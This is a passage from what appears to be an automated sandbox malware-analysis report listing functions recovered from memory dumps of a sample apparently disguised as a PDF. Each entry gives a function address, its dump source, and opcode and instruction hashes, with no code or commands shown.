                                • Opcode ID: 3e9a6df86e94ecabed9bea80846103732e92dd084195044efb7022ac7fe22890
                                • Instruction ID: 498ff7b3be6bf41e95920e063c86c3379f36f60501e09588b7c9b0d42c531c00
                                • Opcode Fuzzy Hash: 3e9a6df86e94ecabed9bea80846103732e92dd084195044efb7022ac7fe22890
                                • Instruction Fuzzy Hash: AF616B34F002199FEB559FA8D8147AEBAF7FB88310F20846AD506AB394DB758C458F90
                                Function 064CFCC1 Relevance: .2, Instructions: 178COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90a0b20e4074cba28f28a27f57e7cb3560e4dfa121b6868b4cd0fcf2d31ed46e
                                • Instruction ID: d20a6dce2e8de0a29ec38c9d9303d3d9df21601d5a4517a53f8d39370bb530d9
                                • Opcode Fuzzy Hash: 90a0b20e4074cba28f28a27f57e7cb3560e4dfa121b6868b4cd0fcf2d31ed46e
                                • Instruction Fuzzy Hash: 0751D339E001049FDFD4EB68E4446AEB7B3EF88325F10886ED516D7391DB398859CB80
                                Function 064C9252 Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8c68aaca6ddb5c8811f6c7605c6ffb107a08cdfc6fa0b65278e0d023ca124aa6
                                • Instruction ID: e3fc3b9b062232ae4bf315dd7b6b28f31026ba90a2eb83dfad000646c6ee7939
                                • Opcode Fuzzy Hash: 8c68aaca6ddb5c8811f6c7605c6ffb107a08cdfc6fa0b65278e0d023ca124aa6
                                • Instruction Fuzzy Hash: 02515174B509049FDB94DB68D960BAE7BF2FBC8310F50856AC409E7388EF709C018BA1
                                Function 064CFA70 Relevance: .2, Instructions: 170COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b5f939ac87df6c3111f98181d49dc683ff352b3f57968990175660c4f59be54
                                • Instruction ID: 2b609ca6be7f616b60cdc80abd810e3f7884ebcd696ea100140c7187e7cd34e5
                                • Opcode Fuzzy Hash: 5b5f939ac87df6c3111f98181d49dc683ff352b3f57968990175660c4f59be54
                                • Instruction Fuzzy Hash: 9151D778B202144BEFE19668D85476F276BEB89320F10842FE40AD7794DB7CCC4593A1
                                Function 064CFA80 Relevance: .2, Instructions: 163COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6cdd0dfa37e39cfcff10e9b39cbb05a9df3d1376c61bff2979f6204aa78926d4
                                • Instruction ID: 951923196a24ecd4e9733f215f59369ff7083543bc89661ef6591d73bff44d6d
                                • Opcode Fuzzy Hash: 6cdd0dfa37e39cfcff10e9b39cbb05a9df3d1376c61bff2979f6204aa78926d4
                                • Instruction Fuzzy Hash: F051C778B202144BEFE59668D85472F266BFB89360F20842FE40BC7794DB7CCC4593A1
                                Function 064C4C69 Relevance: .1, Instructions: 144COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d01b51e98ddca480f4201a004603ca02896dc09409755e916709cd3f59d7ef2
                                • Instruction ID: ce5860ffa6a7cf9186d442f75e8e1a0c85ab58c5bb303d1e13456fdddd764708
                                • Opcode Fuzzy Hash: 1d01b51e98ddca480f4201a004603ca02896dc09409755e916709cd3f59d7ef2
                                • Instruction Fuzzy Hash: B9516074F002189FEB559FA9C8147AEBBF7FF88710F20856AD506AB395DA718C019F90
                                Function 064C5522 Relevance: .1, Instructions: 136COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbff1956ec9f2b4ca03140d3b00722d0282abd49b84d309451c6ae698402f581
                                • Instruction ID: 79e9827b9190e898a477259c13954251a57efd8e61355718e3c0747185d6e099
                                • Opcode Fuzzy Hash: fbff1956ec9f2b4ca03140d3b00722d0282abd49b84d309451c6ae698402f581
                                • Instruction Fuzzy Hash: 6541A275E006099FDFB5CEA9C880AAFF7B2FB54220F10492AE156D7340C330F8658B91
                                Function 064CDBDD Relevance: .1, Instructions: 126COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d61aa59d69139129677b650fcd04b592751f0ab30c32c061c3d63d7e960c602
                                • Instruction ID: 1dfd695422b111163da934887d77b6c1c37c9a93c3ebc211e26b80d491006a95
                                • Opcode Fuzzy Hash: 8d61aa59d69139129677b650fcd04b592751f0ab30c32c061c3d63d7e960c602
                                • Instruction Fuzzy Hash: 8941A334E006099FDBA5DFA5C4446AFBBB2BF85350F10492ED406EB340EB70D846CB91
                                Function 06BB2139 Relevance: .1, Instructions: 115COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b2b18ea344458658893697be038722a15e1a31240c009e6573dfaba5fa7eca4
                                • Instruction ID: 4ed9139ac9d62310ab6e4a6216701cfa0536b71e8f6a5ebc4672bc5b7739f3eb
                                • Opcode Fuzzy Hash: 3b2b18ea344458658893697be038722a15e1a31240c009e6573dfaba5fa7eca4
                                • Instruction Fuzzy Hash: 22415E71E107099FCB14DFA9C8546EDFBB1EF88310F14D659E505BB260EBB0A981CB90
                                Function 064C21D0 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78cf612ddd92067a3b0f3e33eb9e6bda67a461f1d4e048f671f08181745a3640
                                • Instruction ID: 2cab9b04e0e14d7bde871e53a7e46080b3808c04b60733aca52343991c17bd96
                                • Opcode Fuzzy Hash: 78cf612ddd92067a3b0f3e33eb9e6bda67a461f1d4e048f671f08181745a3640
                                • Instruction Fuzzy Hash: 7D31ED34B102059FEB95AB74D4246AF7BA2BF89760F20486DC402DB391EFB5CD01CBA4
                                Function 064CDA90 Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fce7edda5d772d724cd57eb3b26d98a489b73368282ca735a2bacd5e87c056df
                                • Instruction ID: c031d66492ca9d34a1fa0ed5cf14cf71ecce42faeaca99b4ef482ab03749f915
                                • Opcode Fuzzy Hash: fce7edda5d772d724cd57eb3b26d98a489b73368282ca735a2bacd5e87c056df
                                • Instruction Fuzzy Hash: 0331A334E1070A9BDB65DF65D88069FB7B6FF85310F20862AE401AB304EB71E846CB91
                                Function 064C2081 Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5fe8aad3985521ddd7720fbdaed2617594d5f3d12cc8dc32e1a4ed4ad45795ee
                                • Instruction ID: 72eb73e5f76c344a5736a4e351d7a11f474580c5947709fa9cb0b2cf43238d56
                                • Opcode Fuzzy Hash: 5fe8aad3985521ddd7720fbdaed2617594d5f3d12cc8dc32e1a4ed4ad45795ee
                                • Instruction Fuzzy Hash: 7231B234E002159BCB59DF68D85469FBBF2FF89310F10851AE906EB350DBB1AD42CB50
                                Function 064C2090 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5460e20dd04702a065f8734c34c1f40eaf51fecb9d07a19547a91bf54efe3bd
                                • Instruction ID: 029fd804610988e21f57da642ed50ef56d877e4ff856c7b02ece8037f1d5be63
                                • Opcode Fuzzy Hash: d5460e20dd04702a065f8734c34c1f40eaf51fecb9d07a19547a91bf54efe3bd
                                • Instruction Fuzzy Hash: B8316E34E006199BCB55DF68D85469FBBF2FF89310F10852AE906E7354DBB1AD42CB50
                                Function 064C3FB9 Relevance: .1, Instructions: 81COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 38a3141cae55f888d6e9661172ce61382cf0561f9e173829a6de042e23c42fcb
                                • Instruction ID: 7a99def64d81dd227d64eb018492969a866586505da387981d0451125f162903
                                • Opcode Fuzzy Hash: 38a3141cae55f888d6e9661172ce61382cf0561f9e173829a6de042e23c42fcb
                                • Instruction Fuzzy Hash: CC217F75E006149FDB51DF79D980AAEBFF5BB48720F14806AE945E7384E731E841CB90
                                Function 06BB2990 Relevance: .1, Instructions: 80COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9a39dc1f9b3fd4b5ff8276e12d69e5339e083febdd2ed6f34b01c08ace01686
                                • Instruction ID: 23058143efd64256dea20a36cfebc6db2096f4b4e935c0869e7c6d2b80413da0
                                • Opcode Fuzzy Hash: f9a39dc1f9b3fd4b5ff8276e12d69e5339e083febdd2ed6f34b01c08ace01686
                                • Instruction Fuzzy Hash: 3C218D78B002008FDB54EB78D854BAF7BB6EBC8700F2084A9D406D7755DB719C02CB91
                                Function 064C3FC8 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d509e451289c0d3ee8d3185dbfb6fcdc75d9b1e10bc4e8b24b9afbffa391101a
                                • Instruction ID: 9dd9d8d0af21a20a93f3336dba9322e3b4179e7510c31b7454971a31b7d6cabf
                                • Opcode Fuzzy Hash: d509e451289c0d3ee8d3185dbfb6fcdc75d9b1e10bc4e8b24b9afbffa391101a
                                • Instruction Fuzzy Hash: BD217F75E006149FDB90DF69D940AAEBBF5BB48720F10806AE905E7384E731D841CB90
                                Function 06BB29A0 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f40dff2fbf776b350ac0583751ffb46d555fc7a57e9da8de872b9a9d449f264
                                • Instruction ID: fc032d64116b29258d9644d1aaa36826798b4ab9001819043a519b6b17b3a148
                                • Opcode Fuzzy Hash: 5f40dff2fbf776b350ac0583751ffb46d555fc7a57e9da8de872b9a9d449f264
                                • Instruction Fuzzy Hash: A8219A78B002049FDB54EB68D854B6F7BBAEBC8700F2084A8E406D3754EB71ED01CBA1
                                Function 0258D1F8 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a96c12f7c70af05858de68a8cb24fbba55740e819a5fb24385365948cede2b22
                                • Instruction ID: 8a068b9f5ff95bd168cf5ed1aeb7071afbc56429aa350b4c5f3001448df29f48
                                • Opcode Fuzzy Hash: a96c12f7c70af05858de68a8cb24fbba55740e819a5fb24385365948cede2b22
                                • Instruction Fuzzy Hash: 6621F971505344DFDB14EF20D5C4B2ABBB5FB84314F24C569D80A5B286C3B6D446CAA7
                                Function 0258D3A8 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ff425ee948fcace7ff3a9c330e2031ece10bf5ba51cfde20d3db0279584da825
                                • Instruction ID: 0011608331ce2287ddc6259cd84e4bbcc27a2b93f2ca613ec5abaa4164735ad3
                                • Opcode Fuzzy Hash: ff425ee948fcace7ff3a9c330e2031ece10bf5ba51cfde20d3db0279584da825
                                • Instruction Fuzzy Hash: CF2125B1500344DFDB08EF20D5C0B25BBB5FB84314F24C96DD90A5B2A2C7F6E846CA62
                                Function 0258D030 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02a1c24997e3d9a9b97a4eb6f9175bb4a9c8c9485755afb01f243fd6e1f98c7f
                                • Instruction ID: 10934deec6d2a9c54736f5acc9828d11f1beb2f3d2b3a98759c440895e5e59bf
                                • Opcode Fuzzy Hash: 02a1c24997e3d9a9b97a4eb6f9175bb4a9c8c9485755afb01f243fd6e1f98c7f
                                • Instruction Fuzzy Hash: B321D075504244DFEB14EF20D9C0B36BBB5FB84314F24CA69D80A5A2D2D3B6D846CA66
                                Function 0258D006 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 966e8ce425370b3ed0f99a7a3e1fdc18488b87b3614dfca12517706336e99460
                                • Instruction ID: 57e66bfbd241540d150986fd2de1524e8e1c49f81732678d029c636f4fb23a57
                                • Opcode Fuzzy Hash: 966e8ce425370b3ed0f99a7a3e1fdc18488b87b3614dfca12517706336e99460
                                • Instruction Fuzzy Hash: 7A215C751093C49FCB03DB24D990711BFB1AB46214F29C5DBD8898F2A7C37A984ACB62
                                Function 06BB24BC Relevance: .1, Instructions: 71COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c61ad9d48fbf3c21824331e41972e29bff9dfd39ce475a2bb7f38326c4596c9
                                • Instruction ID: 6bb6513e1e3216b135b49ff5b457ea02a7d9c433e6a1935a4d31a33aee18fa8a
                                • Opcode Fuzzy Hash: 2c61ad9d48fbf3c21824331e41972e29bff9dfd39ce475a2bb7f38326c4596c9
                                • Instruction Fuzzy Hash: 8231C0B0C01218DFDB20CF9AC999BEEBBF5EB48310F24905AE504AB354C7B59945CFA5
                                Function 06BB1D14 Relevance: .1, Instructions: 71COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3902842745.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_6bb0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a6b4fb9c0d98f1f6531c7690575d83aab7d0c28d230c276842fef3ef560f3abf
                                • Instruction ID: 377dbaf9708bb372ce48728c705e2f5337e4e2f912648192664392e43e052a4f
                                • Opcode Fuzzy Hash: a6b4fb9c0d98f1f6531c7690575d83aab7d0c28d230c276842fef3ef560f3abf
                                • Instruction Fuzzy Hash: 1731E0B0C01218DFDB60CF99C599BEEBBF5EB48310F20905AE508AB354C3B59945CFA4
                                Function 064C4310 Relevance: .1, Instructions: 61COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c95c229a68418a3b2237d41ae687b18eac1c2816fb58aeeb5ad9a402701a0a8c
                                • Instruction ID: cbd99739e7a17d1b1ae23a58f83a5e4c40019bd2566aae49c822dd7ddc0ed028
                                • Opcode Fuzzy Hash: c95c229a68418a3b2237d41ae687b18eac1c2816fb58aeeb5ad9a402701a0a8c
                                • Instruction Fuzzy Hash: 4611F5387041201FEBA2957CD960B6FBBDADBCA360F24846EF24AC7B51DD25CC0243A1
                                Function 064C40D8 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 793f95ae5a0b0d9f4c197cd5aedc27b0a75659b627f03ef233ac3968648823fa
                                • Instruction ID: 7d3cf7ea26c3262eb23d74cb286879ebf87a6c55c0181d9c18ad68b79c8c7aca
                                • Opcode Fuzzy Hash: 793f95ae5a0b0d9f4c197cd5aedc27b0a75659b627f03ef233ac3968648823fa
                                • Instruction Fuzzy Hash: B2118E35B105244FDB95967CDC246AE7BFAABC8720F00853AC506EB344DE659C0287E0
                                Function 064CF2B0 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 312fde317f81235dec6b9f9aa3d5128f802b1d0a4c9137245b64cc20d9daf8b7
                                • Instruction ID: a83372e57448463037fc42cce830b0fe84676d79d1adaacd2c265e3308361609
                                • Opcode Fuzzy Hash: 312fde317f81235dec6b9f9aa3d5128f802b1d0a4c9137245b64cc20d9daf8b7
                                • Instruction Fuzzy Hash: 7801B138B041501FCBA296789864B6F6BD7DBCA220B24886FE10AC7751E929CC078796
                                Function 064C3D92 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6eda63aeedc68efa63241a243c4394c8e12514f635ac14040dfdd9daaed94cf3
                                • Instruction ID: 1c9abbd5f20259c3f0fe853ef2ce2f9440b44a70c20f5457f2c5f1e6395661cd
                                • Opcode Fuzzy Hash: 6eda63aeedc68efa63241a243c4394c8e12514f635ac14040dfdd9daaed94cf3
                                • Instruction Fuzzy Hash: 7F21C3B5D01219AFDB00DF9AD884ADEFBF4FB49320F10812AE918A7340D3756954CFA5
                                Function 064CA418 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d539f1c074a5e6a2f26d2ed9f9016738edade59a86486b795f6971eff8c3fddd
                                • Instruction ID: faae446d4eeaaa8edc14f45217bd57e55429c6780c63b61661f35e7eabde3794
                                • Opcode Fuzzy Hash: d539f1c074a5e6a2f26d2ed9f9016738edade59a86486b795f6971eff8c3fddd
                                • Instruction Fuzzy Hash: FC012834B005280FDB92DA7CE45477B77D6DB8A320F14856AE60DCB355DE11DC428395
                                Function 0258D1F3 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d692a0047d57c856fe9c281bc03ca2a8a9bd8913fa11d24a2e87d76695bbbe94
                                • Instruction ID: c8ae503d45a17959f23740dcdd34bce636aa935ba54e29e4b74fcdf39726834d
                                • Opcode Fuzzy Hash: d692a0047d57c856fe9c281bc03ca2a8a9bd8913fa11d24a2e87d76695bbbe94
                                • Instruction Fuzzy Hash: C4110476504280DFDB11DF10D5C4B15FFB1FB84324F24C6AAD8491B686C37AD406CB92
                                Function 0258D3A3 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3858309650.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_258d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 669c761da25242077e916b9179d16d2a8aab0fb02cbcee5f028be33ae255b2b4
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: BA11D075504240CFCB05DF20D5C4B15BFB2FB84314F24C6AED9494B6A6C3BAE44ACB52
                                Function 064C40C8 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3999867c4f104156dc6858283b5f98b711f7e0f59c58d224c6f15c4a9f8b4ab7
                                • Instruction ID: 7d6521599dd59ce250518ac208eb45b37869ed40b47fda712d74c785c546d5c9
                                • Opcode Fuzzy Hash: 3999867c4f104156dc6858283b5f98b711f7e0f59c58d224c6f15c4a9f8b4ab7
                                • Instruction Fuzzy Hash: 5C01F535B105244FDB95967CDC206AFBBFAABC8310F04413AC645D7344DF619C0187E1
                                Function 064C3D98 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c48d17710ddab6d0530cc9c57a17b52f1965fb9f2e383f3f47969ed087636b31
                                • Instruction ID: 29e5377aa9d7d9b36c7d4496bd957f99d75040072c0178d27688433b012551e9
                                • Opcode Fuzzy Hash: c48d17710ddab6d0530cc9c57a17b52f1965fb9f2e383f3f47969ed087636b31
                                • Instruction Fuzzy Hash: 6711D0B5D01219AFCB00CF9AD884ADEFBF4FB48320F10812AE918A7340C375A954CFA5
                                Function 064C4320 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e3291ed3008d1baba7793ec5880ea2089d069c503886025843c985f044fb631
                                • Instruction ID: d850813d150f0b963323dc4b72355a9f153c17e4aa5d3685e75582478342ff51
                                • Opcode Fuzzy Hash: 0e3291ed3008d1baba7793ec5880ea2089d069c503886025843c985f044fb631
                                • Instruction Fuzzy Hash: 37018135B001200BEBA595BDE560B6FB3DBEBC9760F20843EE20AC7B64DE65DC024395
                                Function 064CF2C0 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ce098ddd19d632a63580dad09686140a872bb37d290aa93b93b471257209fecd
                                • Instruction ID: 91032a4713f9fe74f50d1ff5706437248a1b9f7ba00b903a39ceffa7457c602f
                                • Opcode Fuzzy Hash: ce098ddd19d632a63580dad09686140a872bb37d290aa93b93b471257209fecd
